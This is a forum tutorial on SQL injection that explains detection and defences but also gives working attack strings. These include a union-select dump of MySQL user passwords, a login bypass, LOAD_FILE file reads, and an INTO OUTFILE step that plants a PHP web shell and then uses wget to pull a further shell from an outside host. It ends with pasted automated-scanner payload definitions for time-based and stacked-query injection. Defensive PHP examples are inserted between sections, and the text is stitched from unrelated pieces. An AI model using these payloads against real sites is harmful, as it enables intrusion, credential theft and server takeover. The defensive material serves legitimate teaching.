Guardiran Security Team Forum


Hello to all friends.

I want to explain, in a simple, beginner-level way, how an SQL bug comes about and how to find it from the code. The sources shown here are very simple; the rest are private.

A type of attack in which the attacker, by injecting SQL commands into inputs that lead to the database, extracts the desired information from the database and carries out their goals against the target.

This vulnerability arises when the inputs that reach the database are not restricted. As a result, the attacker sends commands to the database in addition to the commands and requests that are sent to the server, and extracts information from it.

To understand how this vulnerability occurs in practice, consider the following hypothetical address:

www.site.com/page.php?id=5

In the hypothetical address above, the part page.php?id=5 forms a query whose code looks like this:

<?php
// Vulnerable on purpose: id is concatenated into the query without any check.
$sql = "SELECT * FROM logs WHERE id=" . $_GET["id"];
$result = mysql_query($sql);
?>

In the code above, the query is placed in the variable sql, and sql is executed through the mysql_query function; the overall result ends up in the variable result. The problem with this code is that the id parameter is read from $_GET without any restriction.

Note: the mysql_query function runs SQL queries against a MySQL database.

So the original form of the address above, before the query is executed, is as follows:

www.site.com/ SELECT * FROM logs WHERE id=5

And when we perform the injection in the site's URL, it looks like this:

www.site.com/SELECT * FROM logs WHERE id=5 union select null, concat(user,password) from mysql.user--

The result of this injection is disclosure of the database users' information. The URL is not the only way to carry out this attack, though; it can also be carried out through inputs such as forms or cookies.

For example:

$query = "SELECT * FROM users WHERE uname='" . $_POST['Username'] . "' AND password='" . $_POST['Password'] . "';";

In this pseudo-code, login is expected to succeed only when the username (Username) and password (Password) are entered correctly, but with a simple trick the username can be entered in such a way that login succeeds without the password being checked. It is enough to enter the following in place of the username and password:

' OR 1=1 --

In that case the SQL statement will be executed as follows:

SELECT * FROM users WHERE uname='' OR 1=1 --AND password='';

In SQL syntax, whatever follows -- is not executed, and 1=1 is an expression that is always true, so the user is accepted. In this way, without having a username and password and only by injecting SQL code into the database, we were able to get into the site's user area.

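The login bypass described above next to its fix, as an added example that is not part of the original post. It assumes PHP with the pdo_sqlite extension and uses PDO prepared statements; the table, user name and password are constructed sample data.

```php
<?php
// Added example, not code from the original post. The password column is
// compared inside SQL only because the post's query does so; the single
// difference between the two functions is how the input reaches the database.

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE users (uname TEXT, password TEXT)");
    $db->exec("INSERT INTO users VALUES ('alice', 'S3cret-pass')");   // constructed row
    return $db;
}

// Same construction as the post's pseudo-code: input becomes part of the SQL text.
function loginConcatenated(PDO $db, string $uname, string $password): bool
{
    $sql = "SELECT * FROM users WHERE uname='" . $uname .
           "' AND password='" . $password . "';";
    return $db->query($sql)->fetch() !== false;
}

// Placeholders keep the SQL text fixed; the driver passes the values separately,
// so quotes and comment markers in the input are compared as plain data.
function loginPrepared(PDO $db, string $uname, string $password): bool
{
    $stmt = $db->prepare(
        'SELECT 1 FROM users WHERE uname = :uname AND password = :password'
    );
    $stmt->execute([':uname' => $uname, ':password' => $password]);
    return $stmt->fetch() !== false;
}

$db = makeDb();
$input = "' OR 1=1 --";   // the input shown in the post

$cases = [
    'valid credentials' => ['alice', 'S3cret-pass'],
    'wrong password'    => ['alice', 'wrong'],
    'input from post'   => [$input, $input],
];

foreach ($cases as $label => [$u, $p]) {
    printf(
        "%-18s concatenated=%-5s prepared=%s\n",
        $label,
        var_export(loginConcatenated($db, $u, $p), true),
        var_export(loginPrepared($db, $u, $p), true)
    );
}
```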

Ways to discover an SQL injection vulnerability

Reviewing the HTML code

We review the HTML of the home page and other likely pages, and run the SQL injection test on the queries that appear as links or data-submission forms.

<html>
 ...
<body>
<a href="about.php?id=2">about us</a>
</body>
 ...
</html>

For example, the code above contains a link that may be backed by an SQL query.

(site.com/about.php?id=2) 

So we run the SQL injection test.

To do this, we put characters (for example a quotation mark) at the end of the address (URL), and if we run into the well-known errors, the site is vulnerable to SQL injection.

site.com/about.php?id=2'
site.com/about.php?id=2 and 1=1  

The known errors that indicate an SQL injection vulnerability for different databases are as follows:

MYSQL

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server

MSSQL

Unclosed quotation mark before the character string

ORACLE

ORA-01756: quoted string not properly terminated

ORA-00933: SQL command not properly ended

The reason these errors appear is that the input reaching the database is not restricted, and the submitted characters are sent to the database along with the other commands.

- Using scanners

The target websites can be scanned using available scanner software.

One of the best-known scanners is Acunetix Web Vulnerability Scanner.

Reviewing the HTTP codes in the header

When a website is opened in a browser, the connection to the server is actually made over the HTTP protocol. When a request is sent to the web server over this protocol, a header (HTTP header) is sent to the server along with the request, and the server's response also carries such a header, so that the correctness of the connection can be confirmed.

When connecting to the server, a header accompanies the request sent to the server and the responses returned from it; this header contains fields, one of which is the HTTP code.

For example, when the site guardiran.org is opened, the request goes to the server and the result comes back to the browser in the form of a header:

 
GET / HTTP/1.1
Host: http://guardiran.org/forums/
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=36873331.532336695.1360094362.1360094362.1360094362.1; __utmz=36873331.1360094362.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none )
Connection: keep-alive  

Returned result:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: friday, 022 may 2015 07:52:18 GMT
Content-Length: 5096  

In the headers above, the first of which belongs to the request and the second to the server's response, the HTTP code of the server's response is 200, which means the request was received correctly. There are two HTTP codes that, after injecting a character at the end of the URL, are a sign of an SQL injection vulnerability: codes 302 and 500.

HTTP/1.1 500 Internal Server Error
Date: friday, 022 may 2015 13:08:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 159
Date: friday, 022 may 2015 13:42:04 GMT
Location: /index.aspx
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private

To see these headers you can install the Live HTTP Headers add-on in the Firefox browser.

http://addons.mozilla.org/en/firefox/addon/live-http-headers

After installing the add-on, you can reach it from the Tools menu in Firefox, and with it you can view the header, analyze it and even edit it.


Types of SQL code injection attacks against the database

The reactions databases show during injection have, over time, given rise to different kinds of injection. To keep this from getting long, we leave the description of the attacks for later and only introduce the types of attack here.

A: UNION-BASED SQL INJECTION (injection based on combining two queries)
A type of injection in which the results of two SQL statements are combined through UNION and the result is displayed together.

query.php?id=20    UNION SELECT 1,2,3,4,5
First Query        Second Query

In some database versions, such as MySQL version 5 and above, there is an additional table called information_schema, in which all the system information, including the names of all tables and columns, can be found. This helps greatly in speeding up the extraction of information, because once it is known, with the help of the information_schema table, that a table named admin with the two columns password and username exists, all that remains is to select the table's data and display its contents.

B: ERROR-BASED SQL INJECTION (injection based on errors)

A type of injection in which the injection is carried out, based on the errors the database returns, in such a way that information is extracted. The procedure is that we inject statements so that column and table names are shown in the form of an error, and we can then use that information in the rest of the injection.

C: BLIND-BASED SQL INJECTION (blind injection)

In this type of injection no information or error is displayed by the database, and the hacker guesses the results only through the True/False responses received from the database.

Blind injection can itself be divided into two categories:

1- Boolean Based: the results take the form True/False.

2- Time Based: the results take the form of time-based True/False.

During injection, if the web page is displayed correctly, the injected statement is true (True), and if it is not displayed correctly, it is false (False).

During injection, if the website loads after the delay set with delay functions (for example 2 seconds), the condition is true (True); otherwise it is false (False).

- Reading and creating files with SQL INJECTION

Some SQL functions make it possible for us to read a file from the system or upload a file of our choice onto the server.

site/index.php?id=-7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, load_file(/home/buscocas/www/login.php),29-- 

The result of this example is that the code of the PHP file is displayed in the web page; if an error occurs, the file path can be hex-encoded.

site/index.php?id=-7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, load_file(0x2f686f6d652f627573636f6361732f7777772f6c6f67696e2e706870),29--  

Creating a file is also possible with SQL statements:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO OUTFILE '/var/www/cmd.php'--

If an error occurs, we hex-encode the path:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO OUTFILE '0x2f7661722f7777772f636d642e706870'--

Up to this point a file named cmd.php has been created that makes it possible to run command lines; to run it we use the following address:

http://Site.com/cmd.php?cmd=ls

This lists the files in the site's root. Now, through this command line, we can download a shell or any file we want onto the host.

http://Site.com/shell.php?cmd=wget http://mysite.com/shell.php

Here the PHP file is downloaded from the specified path onto the host and can be executed.

http://Site.com/shell.php 

Note: the LOAD_FILE() function is used to read and load existing files.

Note: with INTO OUTFILE, the contents X can be written into the specified file.

SELECT X INTO OUTFILE 'test.php'
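The signals named in the two posts above (a quote or boolean test answered with 500 or 302, UNION SELECT, information_schema, LOAD_FILE, INTO OUTFILE, delay functions) turned into a check a site owner can run over their own access log. This is an added example, not part of the original thread; the log lines are constructed and the marker list is an assumption to tune per application.

```php
<?php
// Added example, not code from the thread. Only the query string is inspected:
// form fields and cookies do not appear in a standard access log.

const SQLI_MARKERS = [
    'quote'              => "/'/",
    'boolean test'       => '/\b(?:and|or)\s+\d+\s*=\s*\d+/i',
    'union select'       => '/\bunion\b.{0,40}?\bselect\b/is',
    'information_schema' => '/\binformation_schema\b/i',
    'file read'          => '/\bload_file\s*\(/i',
    'file write'         => '/\binto\s+(?:out|dump)file\b/i',
    'time delay'         => '/\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b/i',
];

// Returns null for unparseable or clean lines, otherwise a finding.
function analyzeLine(string $line): ?array
{
    // host ident user [time] "METHOD target PROTOCOL" status ...
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) /', $line, $m)) {
        return null;
    }
    [, $ip, $target, $status] = $m;

    $pos = strpos($target, '?');
    if ($pos === false) {
        return null;                       // no query string, nothing to inspect
    }
    // Decode twice so that %2527 (a double-encoded quote) is also seen.
    $query = urldecode(urldecode(substr($target, $pos + 1)));

    $hits = [];
    foreach (SQLI_MARKERS as $name => $regex) {
        if (preg_match($regex, $query)) {
            $hits[] = $name;
        }
    }
    if ($hits === []) {
        return null;
    }

    // A 500 or 302 answer to such a request is the sign described in the thread
    // that the input reached the query; file markers are always urgent.
    $errorStatus = in_array($status, ['500', '302'], true);
    $fileAccess  = (bool) array_intersect($hits, ['file read', 'file write']);

    return [
        'ip'       => $ip,
        'target'   => $target,
        'status'   => (int) $status,
        'markers'  => $hits,
        'priority' => ($errorStatus || $fileAccess) ? 'high' : 'review',
    ];
}

// Constructed sample lines in "combined" access-log format.
$sampleLog = <<<'LOG'
203.0.113.7 - - [22/May/2015:13:08:20 +0000] "GET /about.php?id=2 HTTP/1.1" 200 5096 "-" "Mozilla/5.0"
203.0.113.7 - - [22/May/2015:13:08:25 +0000] "GET /about.php?id=2%27 HTTP/1.1" 500 3026 "-" "Mozilla/5.0"
203.0.113.7 - - [22/May/2015:13:08:31 +0000] "GET /about.php?id=2+and+1%3D1 HTTP/1.1" 200 5096 "-" "Mozilla/5.0"
203.0.113.7 - - [22/May/2015:13:42:04 +0000] "GET /query.php?id=20+UNION+SELECT+1,2,3,4,5 HTTP/1.1" 302 159 "-" "Mozilla/5.0"
198.51.100.9 - - [22/May/2015:14:02:11 +0000] "GET /index.php?id=-1+UNION+SELECT+1,load_file(0x2f746d702f78) HTTP/1.1" 200 812 "-" "Mozilla/5.0"
LOG;

foreach (explode("\n", $sampleLog) as $line) {
    $finding = analyzeLine($line);
    if ($finding !== null) {
        printf(
            "[%s] %s %d %s (%s)\n",
            $finding['priority'],
            $finding['ip'],
            $finding['status'],
            $finding['target'],
            implode(', ', $finding['markers'])
        );
    }
}
```

LOAD_FILE() and INTO OUTFILE require the MySQL FILE privilege and are limited by secure_file_priv, so an application account without FILE cannot perform the file operations these markers point to.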

Ways to counter code injection

There are various ways to prevent this kind of thing in different programming languages, which you will get to know below.

First, in designing and using the database, keep these two points in mind:

1- As far as possible, use users with low privilege levels to connect to the database. This does not prevent SQL injection, but it helps ensure that nobody can run malicious code on the database, so if SQL injection exists the intruder will have less room to maneuver.

2- Always store important information such as passwords in encoded form in the database. This does not prevent SQL injection either, but it means that if an attacker breaks into the database, they cannot easily obtain information such as passwords.

3- Try to log the statements executed in the database. Although this does not help prevent SQL injection, it lets you see the executed statements, recognize your mistakes and fix them. To log statements you can use databases that have this capability, or use the facilities of your programming language to store them somewhere safe.

- Preventing SQL INJECTION in PHP

1- Always make sure the type of the input variable is correct. PHP has various variable types. You can check the input type with functions such as ctype_digit and ctype_alnum and the other functions of the ctype family, or with the gettype function. You can also make sure the data is valid by using regular expressions (PCRE).

2- If a number is to go into the SQL statement, make sure with functions such as is_numeric that the input really is a number, or always convert the input type with a function such as settype, intval, floatval or …

3- Escape string inputs with the functions of the database in question (such as mysql_real_escape_string or sqlite_escape_string or ...), and if no such function exists for your database, do this with functions such as addslashes or str_replace. This ensures that a character such as ' has no effect on the SQL structure, and the input is given to the statement as a variable and does not affect the statement.

4- Using stored procedures is one of the best ways to prevent SQL injection in databases that support them. Unfortunately, not all databases have this capability.

5- Try never, under any circumstances, to show the user an error that occurred in the database, because displaying these errors can let the attacker know what happened in the database. PHP has various ways to prevent errors from being displayed. One of the best known is to use the @ operator before the statement in question. When this operator is used, PHP ignores the error messages of that statement. An example of using the operator:

$my_file = @file('names.php') or die('failed');

- Preventing SQL INJECTION in ASP.NET

1- Be sure of your inputs. As far as possible, check all inputs for data type, string length, numeric range and so on. For this you can use Regex, RegularExpressionValidator or RangeValidator.

2- Using inputs in stored procedures is a very good approach. Note that using stored procedures without using inputs does not prevent SQL injection. For this you can use SqlParameter and SqlParameterCollection.

Also, if you have to use dynamic statements, specify the types of the inputs using SqlParameterCollection.

3- As far as possible, use APIs such as ADO.NET and their features, because with these programming interfaces the exact data types can be specified and you can be sure that the inputs are escaped correctly.

Example: in this sample code, the hole has been closed as far as possible with the methods described:

// C# (ASP.NET)
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

// Part 1: validate the format of the input before it is used.
public void Login(string uname, string password)
{
    // Username: letters, apostrophe, dot or whitespace, 1 to 20 characters.
    if (!Regex.IsMatch(uname, @"^[a-zA-Z'.\s]{1,20}$"))
        throw new FormatException("Invalid username");
    // Password: 6 to 15 characters containing a digit, a lowercase and an uppercase letter.
    if (!Regex.IsMatch(password, @"^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{6,15}$"))
        throw new FormatException("Invalid password");
}

// Part 2: call the stored procedure with a typed, length-limited parameter.
// connectionString and the SSN text box are defined elsewhere in the page.
using (SqlConnection connection = new SqlConnection(connectionString))
{
    DataSet dataset = new DataSet();
    SqlDataAdapter command = new SqlDataAdapter("LoginStoredProcedure", connection);
    command.SelectCommand.CommandType = CommandType.StoredProcedure;
    command.SelectCommand.Parameters.Add("@au_id", SqlDbType.VarChar, 11);
    command.SelectCommand.Parameters["@au_id"].Value = SSN.Text;
    command.Fill(dataset);
}
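One way to apply points 1, 2 and 5 of the PHP list above to the thread's page.php?id= case, as an added example that is not part of the original post. It uses a PDO prepared statement with exception handling and error_log() rather than the escape functions and the @ operator named in the post; fetchLogEntry() and the logs rows are hypothetical, and the pdo_sqlite extension is assumed.

```php
<?php
// Added example, not code from the original post. The logs table and its row
// are constructed sample data; fetchLogEntry() is a hypothetical helper name.

ini_set('display_errors', '0');   // PHP errors go to the server log, not into the page

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE logs (id INTEGER PRIMARY KEY, message TEXT)');
    $db->exec("INSERT INTO logs VALUES (5, 'user alice logged in')");
    return $db;
}

/**
 * Handles the raw id parameter of page.php?id=... and returns
 * ['status' => int, 'body' => string].
 */
function fetchLogEntry(PDO $db, $rawId): array
{
    // Points 1 and 2: accept only a short run of decimal digits, then convert.
    // is_string() rejects arrays such as page.php?id[]=5.
    if (!is_string($rawId) || !ctype_digit($rawId) || strlen($rawId) > 9) {
        return ['status' => 400, 'body' => 'Invalid id'];
    }
    $id = intval($rawId);

    try {
        // The value is bound as an integer and never becomes part of the SQL text.
        $stmt = $db->prepare('SELECT message FROM logs WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Point 5: the database error is recorded server-side; the visitor
        // only sees a generic message.
        error_log('logs lookup failed: ' . $e->getMessage());
        return ['status' => 500, 'body' => 'Internal error'];
    }

    if ($row === false) {
        return ['status' => 404, 'body' => 'Not found'];
    }
    return [
        'status' => 200,
        'body'   => htmlspecialchars($row['message'], ENT_QUOTES, 'UTF-8'),
    ];
}

$db = makeDb();

// Constructed inputs: a valid id, the two test strings from the thread,
// an array value, and an id that does not exist.
$inputs = ['5', "2'", '2 and 1=1', ['5'], '6'];

foreach ($inputs as $raw) {
    $result = fetchLogEntry($db, $raw);
    printf("%-14s -> %d %s\n", json_encode($raw), $result['status'], $result['body']);
}
```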

inline_query payload


stacked_queries payload

    <test>        <title>SQLite > 2.0 stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>3</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>4</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>        <request>            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>        <test>        <title>Firebird stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>        <request>            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>SAP MaxDB stacked queries (heavy query - comment)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>        <request>            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB stacked queries (heavy query)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>        <request>            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>4</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>        <test>        <title>HSQLDB >= 1.7.2 stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 2.0 stacked queries (heavy query - comment)</title>        <stype>4</stype>        <level>4</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 2.0 stacked queries (heavy query)</title>        <stype>4</stype>        <level>5</level>        <risk>2</risk>        <clause>0</clause>        <where>1</where>        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>        <request>            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>    <!-- TODO: if possible, add payload for Microsoft Access -->    <!-- End of stacked queries tests --></root>

time blind payload

<?xml version="1.0" encoding="UTF-8"?>
<root>    <!-- Time-based boolean tests -->
    <test>        <title>Oracle AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>IBM DB2 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>IBM DB2 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
